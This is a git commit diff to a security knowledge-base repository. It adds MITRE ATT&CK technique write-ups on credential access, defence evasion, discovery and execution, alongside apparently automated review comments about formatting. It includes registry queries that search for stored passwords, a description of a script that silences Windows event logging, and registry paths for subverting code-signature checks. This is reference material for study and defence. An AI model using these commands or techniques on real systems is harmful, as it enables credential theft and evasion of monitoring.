
Update to ATT&CK structure, so that it actually reflects the current model. Next update will be content additions to the ATT&CK sections

pull/14/head
rmusser01 4 years ago
parent
commit
36d319e223
48 changed files with 1966 additions and 901 deletions
  1. +20 -6    Draft/ATT&CK-Stuff/Collection.md
  2. +16 -0    Draft/ATT&CK-Stuff/Command_and_Control.md
  3. +33 -0    Draft/ATT&CK-Stuff/Credential_Access.md
  4. +114 -15  Draft/ATT&CK-Stuff/Defense_Evasion.md
  5. +25 -2    Draft/ATT&CK-Stuff/Discovery.md
  6. +176 -63  Draft/ATT&CK-Stuff/Execution.md
  7. +76 -0    Draft/ATT&CK-Stuff/Initial_Access.md
  8. +42 -11   Draft/ATT&CK-Stuff/Lateral Movement.md
  9. +121 -33  Draft/ATT&CK-Stuff/Persistence.md
  10. +110 -51 Draft/ATT&CK-Stuff/Privilege_Escalation.md
  11. +7 -1    Draft/AnonOpsecPrivacy.md
  12. +2 -1    Draft/Attacking Defending Android -.md
  13. +13 -0   Draft/Basic Security Information.md
  14. +13 -0   Draft/Building A Pentest Lab.md
  15. +2 -1    Draft/Cheat sheets reference pages Checklists -.md
  16. +4 -0    Draft/Courses_Training.md
  17. +68 -52  Draft/Cryptography & Encryption.md
  18. +38 -9   Draft/Defense.md
  19. +14 -7   Draft/Documentation & Reports -.md
  20. +5 -0    Draft/Embedded Device & Hardware Hacking -.md
  21. +3 -0    Draft/Exfiltration.md
  22. +8 -0    Draft/Exploit Development.md
  23. +2 -0    Draft/Forensics Incident Response.md
  24. +22 -15  Draft/Fuzzing Bug Hunting.md
  25. +57 -48  Draft/Game Hacking.md
  26. +8 -1    Draft/Interesting Things Useful stuff.md
  27. +9 -1    Draft/Malware.md
  28. +17 -4   Draft/Network Attacks & Defenses.md
  29. +13 -0   Draft/Network Security Monitoring & Logging.md
  30. +2 -0    Draft/Open Source Intelligence.md
  31. +20 -13  Draft/Password Bruting and Hashcracking.md
  32. +13 -1   Draft/Phishing.md
  33. +28 -30  Draft/Policy-Compliance.md
  34. +6 -2    Draft/Port_List.md
  35. +58 -20  Draft/Privilege Escalation & Post-Exploitation.md
  36. +19 -0   Draft/Programming - Languages Libs Courses References.md
  37. +40 -4   Draft/Red-Teaming.md
  38. +11 -1   Draft/Reverse Engineering.md
  39. +29 -16  Draft/Rootkits.md
  40. +3 -4    Draft/SCADA.md
  41. +13 -4   Draft/System Internals Windows and Linux Internals Reference.md
  42. +219 -149 Draft/Web & Browsers.md
  43. +30 -8   Draft/Wireless Networks & RF.md
  44. +10 -1   Draft/config.json
  45. +5 -0    Draft/theme-blue-min.css
  46. +5 -0    Draft/theme-min-blue.css
  47. +23 -0   Draft/theme.min.css
  48. +394 -327 Draft/things-added.md

Draft/ATT&CK-Stuff/Collection.md (+20 -6)

@ -54,12 +54,6 @@
-------------------------------
## Browser Extensions
* [Browser Extensions - ATT&CK](https://attack.mitre.org/wiki/Technique/T1176)
* Browser extensions or plugins are small programs that can add functionality and customize aspects of internet browsers. They can be installed directly or through a browser's app store. Extensions generally have access and permissions to everything that the browser can access.12
-------------------------------
## Clipboard Data
* [Clipboard Data - ATT&CK](https://attack.mitre.org/wiki/Technique/T1115)
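Review bot: removing Browser Extensions (T1176) from Collection.md is the right call, since ATT&CK files T1176 under Persistence, but confirm the same text was re-added to Persistence.md in this commit (that file is touched here, +121/-33) and drop the trailing footnote residue `12` at the end of the description when it moves, as it is a citation marker carried over from the ATT&CK page.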
@ -87,6 +81,26 @@
-------------------------------
## Data from Information Repositories
* [Data from Information Repositories - ATT&CK](https://attack.mitre.org/wiki/Technique/T1213)
* Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.
* The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
* Common information repositories:
* Microsoft SharePoint
* Found in many enterprise networks and often used to store and share significant amounts of documentation.
* Atlassian Confluence
* Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation.
-------------------------------
## Data from Local System
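Review bot: the nested lists in the new Data from Information Repositories entry are flattened: the eight example items after "The following is a brief list...", the two repositories after "Common information repositories:", and the one-line descriptions under Microsoft SharePoint and Atlassian Confluence all sit at the same `* ` level as their parent bullets, so they render as siblings rather than sub-lists. Indent each level (two or four spaces, matching the rest of the file) so the hierarchy from the ATT&CK page survives.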


Draft/ATT&CK-Stuff/Command_and_Control.md (+16 -0)

@ -206,6 +206,22 @@
-------------------------------
## Port Knocking
* [Port Knocking - ATT&CK](https://attack.mitre.org/wiki/Technique/T1205)
* Port Knocking is a well-established method used by both defenders and adversaries to hide open ports from access. To enable the port, the system expects a series of packets with certain characteristics before the port will be opened. This is often accomlished by the host based firewall, but could also be implemented by custom software.
* This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.
* The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r, is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
-------------------------------
## Remote Access Tools
* [Remote Access Tools](https://attack.mitre.org/wiki/Technique/T1219)
* An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be whitelisted within a target environment. Remote access tools like VNC, Ammy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
* Remote access tools may be established and used post-compromise as alternate communications channel for Redundant Access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.
## Remote File Copy
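Review bot: a few copy issues in the Port Knocking and Remote Access Tools additions: `accomlished` should be `accomplished`; "This technique has been observed to both for the dynamic opening" should read "has been observed both for the dynamic opening"; the `[Remote Access Tools](...)` link is the only entry without the ` - ATT&CK` suffix used by every other heading link; and the new section runs straight into `## Remote File Copy` without the `-------------------------------` separator the file places before each `##` heading.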


Draft/ATT&CK-Stuff/Credential_Access.md (+33 -0)

@ -148,6 +148,27 @@ Memory corruption is for wussies
----------------------------
## Credentials in Registry
* [Credentials in Registry - ATT&CK](https://attack.mitre.org/wiki/Technique/T1214)
* The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
* Example commands to find Registry keys related to password information:1
* Local Machine Hive: `reg query HKLM /f password /t REG_SZ /s`
* Current User Hive: `reg query HKCU /f password /t REG_SZ /s`
----------------------------
## Exploitation for Credential Access
* [Exploitation for Credential Access - ATT&CK](https://attack.mitre.org/wiki/Technique/T1212)
* Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions. Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.
----------------------------
## Exploitation of Vulnerability
* [Exploitation of Vulnerability - ATT&CK](https://attack.mitre.org/wiki/Technique/T1068)
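Review bot: the `1` at the end of "Example commands to find Registry keys related to password information:1" is a footnote marker from the ATT&CK page, not part of the sentence; remove it (or turn it into a link to the source). The two `reg query` sub-bullets under that line should also be indented so they render as children of the "Example commands" bullet rather than as top-level entries.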
@ -250,6 +271,18 @@ Memory corruption is for wussies
* A pure python, post-exploitation, RAT (Remote Administration Tool) for macOS / OSX.
-------------------------------
## Kerberoasting
* [Kerberoasting - ATT&CK](https://attack.mitre.org/wiki/Technique/T1208)
* Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service).
* Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).67 Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline Brute Force attacks that may expose plaintext credentials.
* This same attack could be executed using service tickets captured from network traffic.
-------------------------------
## Keychain
* [Keychain - ATT&CK](https://attack.mitre.org/wiki/Technique/T1142)
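Review bot: "from a domain controller (DC).67" carries the ATT&CK footnote marker `67` fused onto the period; strip it. Also consider capitalising `Brute Force` consistently with how the file treats other ATT&CK technique names referenced in prose, or linking it, since the Kerberoasting entry's offline-cracking claim depends on it.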


Draft/ATT&CK-Stuff/Defense_Evasion.md (+114 -15)

@ -10,11 +10,15 @@
-------------------------------
## Access Token Manipulation
* [Access Token Manipulation - ATT&CK](https://attack.mitre.org/wiki/Technique/T1134)
* Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command runas. Microsoft runas
* Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level.Pentestlab Token Manipulation
* Adversaries can also create spoofed access tokens if they know the credentials of a user. Any standard user can use the runas command, and the Windows API functions, to do this; it does not require access to an administrator account.
* Lastly, an adversary can use a spoofed token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.
* Metasploit’s Meterpreter payload allows arbitrary token stealing and uses token stealing to escalate privileges. Metasploit access token The Cobalt Strike beacon payload allows arbitrary token stealing and can also create tokens. Cobalt Strike Access Token
* Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command runas.
* Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.
* Access tokens can be leveraged by adversaries through three methods:
* **Token Impersonation/Theft** - An adversary creates a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread. This is useful for when the target user has a non-network logon session on the system.
* **Create Process with a Token** - An adversary creates a new access token with `DuplicateToken(Ex)` and uses it with `CreateProcessWithTokenW` to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.
* **Make and Impersonate Token** - An adversary has a username and password but the user is not logged onto the system. The adversary can then create a logon session for the user using the `LogonUser` function. The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread.
* Any standard user can use the `runas` command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account.
* Metasploit’s Meterpreter payload allows arbitrary token manipulation and uses token impersonation to escalate privileges. The Cobalt Strike beacon payload allows arbitrary token impersonation and can also create tokens.
#### Windows
* [Access Token Manipulation - ATT&CK](https://attack.mitre.org/wiki/Technique/T1134)
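Review bot: the new Access Token Manipulation bullets (from "Windows uses access tokens to determine the ownership..." through the Meterpreter/Cobalt Strike line) restate the five bullets that were already there and that this hunk keeps, so the section now opens with two near-identical copies of the same paragraphs. Delete the older five bullets; they are the ones carrying the inline citation residue (`Microsoft runas`, `Pentestlab Token Manipulation`, `Metasploit access token`, `Cobalt Strike Access Token`) that the rewritten version already drops. The `#### Windows` subsection also repeats the same ATT&CK link that opens the section.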
@ -29,6 +33,21 @@
* [Account Hunting for Invoke-TokenManipulation](https://www.trustedsec.com/2015/01/account-hunting-invoke-tokenmanipulation/)
-------------------------------
## BITS Jobs
* [BITS Jobs - ATT&CK](https://attack.mitre.org/wiki/Technique/T1197)
* Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM)1.2 BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
* The interface to create and manage BITS jobs is accessible through PowerShell and the BITSAdmin tool.
* Adversaries may abuse BITS to download, execute, and even clean up after malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.456 BITS enabled execution may also allow Persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).
* BITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol.
-------------------------------
## Binary Padding
* [Binary Padding - ATT&CK](https://attack.mitre.org/wiki/Technique/T1009)
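Review bot: the BITS Jobs text has footnote residue fused onto words: "(COM)1.2" should be "(COM)." and "host firewalls.456" should be "host firewalls." Also "other applications preferred to operate in the background" reads better as "other applications that prefer to operate in the background".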
@ -37,6 +56,10 @@
-------------------------------
## Bypass User Account Control
* [Bypass User Account Control](https://attack.mitre.org/wiki/Technique/T1088)
@ -82,6 +105,15 @@
-------------------------------
* [CMSTP.exe - ATT&CK](https://attack.mitre.org/wiki/Technique/T1191)
* The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
* Adversaries may supply CMSTP.exe with INF files infected with malicious commands. Similar to Regsvr32 / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs and/or COM scriptlets (SCT) from remote servers. This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.
* CMSTP.exe can also be abused to Bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface.
-------------------------------
## Code Signing
* [Code Signing - ATT&CK](https://attack.mitre.org/wiki/Technique/T1116)
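Review bot: the CMSTP.exe block has no `## CMSTP.exe` heading; the separator is followed directly by the `* [CMSTP.exe - ATT&CK](...)` bullet, so the entry is invisible in the section list and breaks the separator/heading/link pattern used by every other technique in the file. Add the heading, and replace the curly quotes in `”Squiblydoo”` with plain quotes.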
@ -106,12 +138,19 @@
* [How to Evade Application Whitelisting Using REGSVR32 - BHIS](https://www.blackhillsinfosec.com/evade-application-whitelisting-using-regsvr32/)
-------------------------------
## Component Firmware
* [Component Firmware - ATT&CK](https://attack.mitre.org/wiki/Technique/T1109)
* Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to System Firmware but conducted upon other system components that may not have the same capability or level of integrity checking. Malicious device firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.
* [HD Hacking - SpritesMods](http://spritesmods.com/?art=hddhack)
-------------------------------
## Component Object Model Hijacking
* [Component Object Model Hijacking](https://attack.mitre.org/wiki/Defense_Evasion)
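Review bot: the Component Firmware addition looks fine. While here, the trailing context line `[Component Object Model Hijacking](https://attack.mitre.org/wiki/Defense_Evasion)` links the generic tactic page instead of the technique page; the other entries use `https://attack.mitre.org/wiki/Technique/T....` URLs, so this one should point at the COM Hijacking technique page for consistency.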
@ -126,17 +165,30 @@ Component Object Model Hijacking
-------------------------------
## Control Panel Items
* [Control Panel Items - ATT&CK](https://attack.mitre.org/wiki/Technique/T1196)
* Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.
* For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.
* Adversaries can use Control Panel items as execution payloads to execute arbitrary commands. Malicious Control Panel items can be delivered via Spearphishing Attachment campaigns 23 or executed as part of multi-stage malware.4 Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.
-------------------------------
## DLL Injection
* [DLL Injection - ATT&CK](https://attack.mitre.org/wiki/Defense_Evasion)
* DLL injection is used to run code in the context of another process by causing the other process to load and execute code. Running code in the context of another process provides adversaries many benefits, such as access to the process's memory and permissions. It also allows adversaries to mask their actions under a legitimate process. A more sophisticated kind of DLL injection, reflective DLL injection, loads code without calling the normal Windows API calls, potentially bypassing DLL load monitoring. Numerous methods of DLL injection exist on Windows, including modifying the Registry, creating remote threads, Windows hooking APIs, and DLL pre-loading.CodeProject Inject CodeWikipedia DLL Injection
## DCShadow
* [DCShadow - ATT&CK](https://attack.mitre.org/wiki/Technique/T1207)
* DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a Domain Controller (DC). Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
* Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash.
* This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform SID-History Injection and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence.
#### Windows
* [DLL Injection - ATT&CK](https://attack.mitre.org/wiki/Technique/T1055)
* [DLL injection - Wikipedia](https://en.wikipedia.org/wiki/DLL_injection)
* [Inject All the Things - Shutup and Hack](http://blog.deniable.org/blog/2017/07/16/inject-all-the-things/)
* Writeup of 7 different injection techniques
* [Code - Github](https://github.com/fdiskyou/injectAllTheThings)
-------------------------------
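Review bot: the new DCShadow section is inserted in the middle of DLL Injection: it sits between the DLL Injection description bullet and the `#### Windows` subsection, so the DLL Injection links (T1055, the Wikipedia article, "Inject All the Things") now read as DCShadow resources. Move the three DCShadow bullets (with a `## DCShadow` heading and separator) after the DLL Injection `#### Windows` block. Also strip the footnote residue in Control Panel Items ("campaigns 23", "malware.4"), and the DLL Injection bullet still ends in the run-together citation text `CodeProject Inject CodeWikipedia DLL Injection`.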
@ -190,7 +242,11 @@ Component Object Model Hijacking
* [Invoke-Phant0m](https://github.com/hlldz/Invoke-Phant0m)
* This script walks thread stacks of Event Log Service process (spesific svchost.exe) and identify Event Log Threads to kill Event Log Service Threads. So the system will not be able to collect logs and at the same time the Event Log Service will appear to be running.
-------------------------------
## Exploitation for Defense Evasion
* [Exploitation for Defense Evasion - ATT&CK](https://attack.mitre.org/wiki/Technique/T1211)
* Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.
* Adversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for Security Software Discovery. The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.
-------------------------------
@ -344,6 +400,13 @@ Component Object Model Hijacking
-------------------------------
## Indirect Command Execution
* [Indirect Command Execution - ATT&CK](https://attack.mitre.org/wiki/Technique/T1202)
* Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, Forfiles, the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a Command-Line Interface, Run window, or via scripts.
* Adversaries may abuse these utilities for Defense Evasion, specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of cmd.
-------------------------------
## Install Root Certificate
@ -503,6 +566,25 @@ Alternate Data Streams
-------------------------------
## Process Doppelgänging
* [Process Doppelgänging - ATT&CK](https://attack.mitre.org/wiki/Technique/T1186)
* Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction.
* Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10.
* Adversaries may leverage TxF to a perform a file-less variation of Process Injection called Process Doppelgänging. Similar to Process Hollowing, Process Doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext.4
* Process Doppelgänging is implemented in 4 steps4:
* Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.
* Load – Create a shared section of memory and load the malicious executable.
* Rollback – Undo changes to original executable, effectively removing malicious code from the file system.
* Animate – Create a process from the tainted section of memory and initiate execution.
-------------------------------
## Process Hollowing
* [Process Hollowing](https://attack.mitre.org/wiki/Technique/T1093)
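Review bot: in the Process Doppelgänging entry, "leverage TxF to a perform a file-less variation" should be "leverage TxF to perform a file-less variation", and the footnote markers fused onto "SetThreadContext.4" and "4 steps4:" should go. The four Transact/Load/Rollback/Animate bullets should be indented under the "implemented in 4 steps" bullet (or numbered 1-4) so they render as the ordered sub-list the sentence announces rather than as four unrelated top-level points.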
@ -632,6 +714,23 @@ There are multiple approaches to injecting code into a live process. Windows imp
-------------------------------
## SIP and Trust Provider Hijacking
* [SIP and Trust Provider Hijacking - ATT&CK](https://attack.mitre.org/wiki/Technique/T1198)
* In user mode, Windows Authenticode1 digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature.
* Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all ) and are identified by globally unique identifiers (GUIDs).
* Similar to Code Signing, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and whitelisting tools to classify malicious (or any) code as signed by:
* Modifying the `Dll` and `FuncName` Registry values in `HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID}` that point to the dynamic link library (DLL) providing a SIP’s `CryptSIPDllGetSignedDataMsg` function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value all files using that SIP6 (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
* Modifying the `Dll` and `FuncName` Registry values in `HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID}` that point to the DLL providing a SIP’s `CryptSIPDllVerifyIndirectData` function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP6 (with or without hijacking the previously mentioned `CryptSIPDllGetSignedDataMsg` function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
* Modifying the `DLL` and `Function` Registry values in `HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}` that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s `CryptSIPDllVerifyIndirectData` function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
* Note: The above hijacks are also possible without modifying the Registry via DLL Search Order Hijacking.
* Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation.
-------------------------------
## Software Packing
* [Software Packing - ATT&CK](https://attack.mitre.org/wiki/Technique/T1045)
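Review bot: the three Registry paths in the SIP and Trust Provider Hijacking entry are inconsistent: the first is written `HKLM\SOFTWARE[\WOW6432Node\]Microsoft\...` while the second and third use `HKLM\SOFTWARE\[WOW6432Node\]Microsoft\...`. The latter form is the correct one (the optional `WOW6432Node\` component sits between `SOFTWARE\` and `Microsoft`), so fix the first path to match. Also remove the footnote residue in "Authenticode1" and the two occurrences of "SIP6", and indent the three "Modifying the ..." bullets plus the "Note:" bullet under "...classify malicious (or any) code as signed by:" so they read as the list that sentence introduces.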


Draft/ATT&CK-Stuff/Discovery.md (+25 -2)

@ -57,8 +57,16 @@
### File and Directory Discovery
-------------------------------
## Browser Bookmark Discovery
* [Browser Bookmark Discovery](https://attack.mitre.org/wiki/Technique/T1217)
* Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.
* Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially Credentials in Files associated with logins cached by a browser.
* Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.
-------------------------------
### File and Directory Discovery
* [File and Directory Discovery - ATT&CK](https://attack.mitre.org/wiki/Technique/T1083)
* Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
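Review bot: this hunk leaves a dangling `### File and Directory Discovery` heading directly above the new Browser Bookmark Discovery section, with the real `### File and Directory Discovery` heading and its content following after; a reader sees File and Directory Discovery, then Browser Bookmarks, then File and Directory Discovery again. Delete the first copy. Both headings are also `###` where the new section and the rest of the file use `##`, so they should be promoted to `##` at the same time.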
@ -303,8 +311,23 @@ get-WmiObject -list | where {$_.name -match “Printer”}
## Peripheral Device Discovery
-------------------------------
## Password Policy Discovery
* [Password Policy Discovery - ATT&CK](https://attack.mitre.org/wiki/Technique/T1201)
* Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through Brute Force. An adversary may attempt to access detailed information about the password policy used within an enterprise network. This would help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
* Password policies can be set and discovered on Windows, Linux, and macOS systems.
-------------------------------
## Peripheral Device Discovery
* [Peripheral Device Discovery - ATT&CK](https://attack.mitre.org/wiki/Technique/T1120)
* Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
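Review bot: the new Password Policy Discovery entry says policies can be discovered on all three platforms but gives no command, which is the one thing a reader of this file wants; add `net accounts` (local) and `net accounts /domain` for Windows, `/etc/login.defs` plus the `pam_pwquality` or `pam_cracklib` lines under `/etc/pam.d/` for Linux, and `pwpolicy getaccountpolicies` for macOS. On the defensive side the same commands are the tell: `net accounts /domain` from a workstation account is a cheap hunt query in command-line logging.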


+176 -63 Draft/ATT&CK-Stuff/Execution.md

@ -6,8 +6,26 @@
## AppleScript
-------------------------------
## Process Hollowing
* [Process Hollowing - ATT&CK](https://attack.mitre.org/wiki/Technique/T1093)
* Process hollowing occurs when a process is created in a suspended state and the process's memory is replaced with the code of a second program so that the second program runs instead of the original program. Windows and process monitoring tools believe the original process is running, whereas the actual program running is different. Hollowing Process hollowing may be used similarly to DLL Injection to evade defenses and detection analysis of malicious process execution by launching adversary-controlled code under the context of a legitimate process.
#### Windows
* [Process Hollowing - John Leitch - PDF](http://www.autosectools.com/process-hollowing.pdf)
* [Process-Hollowing](https://github.com/m0n0ph1/Process-Hollowing)
* Great explanation of Process Hollowing
-------------------------------
## AppleScript
* [AppleScript - ATT&CK](https://attack.mitre.org/wiki/Technique/T1155)
* macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the `osalang` program.
* AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
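Review bot: this hunk moves Process Hollowing to the head of Execution.md, ahead of AppleScript, which breaks the alphabetical order the rest of the file keeps and does not fit the stated goal of following the current ATT&CK model, where T1093 Process Hollowing is listed under Defense Evasion rather than Execution; either drop it from this file (the matching removal further down already takes it out of its old slot) and keep it in Defense_Evasion.md, or put it back in alphabetical position. The description line also carries a copy artifact, `Hollowing Process hollowing may be used similarly`, where the stray leading `Hollowing` is the tail of the ATT&CK citation label.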
@ -22,34 +40,17 @@
## Application Shimming
-------------------------------
* [Application Shimming - ATT&CK](https://attack.mitre.org/wiki/Technique/T1138)
